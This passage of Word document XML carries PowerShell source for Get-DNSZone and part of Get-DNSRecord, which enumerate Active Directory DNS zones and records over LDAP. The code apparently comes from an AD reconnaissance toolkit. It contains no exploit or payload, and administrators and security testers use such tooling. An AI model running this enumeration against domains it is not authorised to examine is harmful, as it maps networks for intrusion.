    <w:p w14:paraId="709187F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A193199" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for zones, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53907699" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6822B860" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17083131" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3053D102" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A861A03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25A0A83A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F628952" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="223AD6DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4651F8CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51C30832" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E4EB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1FBD9EB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487D9D3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1605AB5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="728BDAD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A572B97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D3036C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return full computer objects instead of just system names (the default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB1E13C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C1A8127" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD9A483" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B890C6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DNSZone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AEC5CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="62E754C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Retrieves the DNS zones for the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABB061" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="589A5686" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F631FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06E8928D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DNSZone -Domain dev.testlab.local -DomainController primary.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234AE452" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B25E101" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Retrieves the DNS zones for the dev.testlab.local domain, reflecting the LDAP queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47359437" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        through the primary.testlab.local domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D83EC4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D3C82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BD72EDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D4320" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38750BFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D593821" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CB40AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A7CFBE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8723C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A32CCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FFABFD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E6F41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061EC36B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B9930" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A70C4EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133F363A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B101427" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32E20824" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F1D2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF27DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D8D499" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D60DBE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E12375" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSSearcher.filter="(objectClass=dnsZone)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A009E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07968152" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($DNSSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EBEB0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Results = $DNSSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA51767" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647FC7C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151FCC6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Properties = Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF22EBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7EAE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29FB0BC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF1700" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2228B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288042BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8CC265" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A7AF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271BA973" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B406D34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AA4839" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA16E94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781BDC42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5FDDCE87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "CN=MicrosoftDNS,DC=DomainDnsZones"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49094D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSSearcher.filter="(objectClass=dnsZone)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF6BD45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="63C7C1ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($DNSSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01679457" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Results = $DNSSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB28F04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46257C3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C6291" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Properties = Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FE1AD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5751A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79E3BD44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E0DEDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD2227E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418218AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F9D468" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295663AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723A27FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1C9D01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BFFA85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA7AE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574A1822" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508CA1DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E2AD9D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0CF3707C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-DNSRecord {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F100C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128795BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76887DC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D4D25E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       Enumerates the Active Directory DNS records for a given zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3481C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FE2417F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ZoneName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F7917C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75950E8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The zone to query for records (which can be enumearted with Get-DNSZone). Required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725BFC27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DE56891" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E95B03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37558836" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for zones, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67575ED9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1DDEA5DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018DF2DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3DAAF17C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FEFCC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E348F0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160AC02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44B38ABD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE4F79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="099BB47F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35680FF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7438D6BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392D4FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73020749" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FDE74C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431E60F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09538E0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DNSRecord -ZoneName testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CDF23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="028922D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Retrieve all records for the testlab.local zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6209BBB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A7324C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E56300C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B7E02B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DNSZone | Get-DNSRecord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3B15D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61C1167E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Retrieve all records for all zones in the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4788CD9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66450B2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CAA2F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55DA29CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DNSZone -Domain dev.testlab.local | Get-DNSRecord -Domain dev.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82A266" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="079CF661" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
